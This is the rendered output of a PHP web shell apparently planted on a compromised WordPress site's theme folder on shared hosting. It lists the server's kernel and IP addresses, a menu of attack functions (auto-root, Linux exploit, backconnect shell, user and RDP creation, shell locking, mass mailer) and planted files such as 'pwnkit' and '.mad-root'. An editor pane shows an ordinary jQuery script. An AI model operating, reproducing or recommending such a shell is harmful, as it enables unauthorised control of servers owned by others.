Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
spark /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
html5.js
2.43
KB
-rw-r--r--
menu.js
1.02
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
smart-image-effect.js
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : smart-image-effect.js
/* Name: Smart Image Effect Author: D5 Creation, ( based on the tutirial http://goo.gl/GjlPJP ) Website: http://d5creation.com Copyright: 2014-2016, D5 Creation License: GNU GPL V2+ */ ( function( jQuery ) { jQuery.fn.hoverfold = function( args ) { this.each( function() { jQuery( this ).children( '.view-staff' ).each( function() { var jQueryitem = jQuery( this ), img = jQueryitem.children( 'img' ).attr( 'src' ), struct = '<div class="slice s1">'; struct +='<div class="slice s2">'; struct +='<div class="slice s3">'; struct +='<div class="slice s4">'; struct +='<div class="slice s5">'; struct +='</div>'; struct +='</div>'; struct +='</div>'; struct +='</div>'; struct +='</div>'; var jQuerystruct = jQuery( struct ); jQueryitem.find( 'img' ).remove().end().append( jQuerystruct ).find( 'div.slice' ).css( 'background-image', 'url(' + img + ')' ).prepend( jQuery( '<span class="overlay" ></span>' ) ); } ); }); }; } )( jQuery ); jQuery(window).load(function() { jQuery( '#grid-staff' ).hoverfold(); });
Close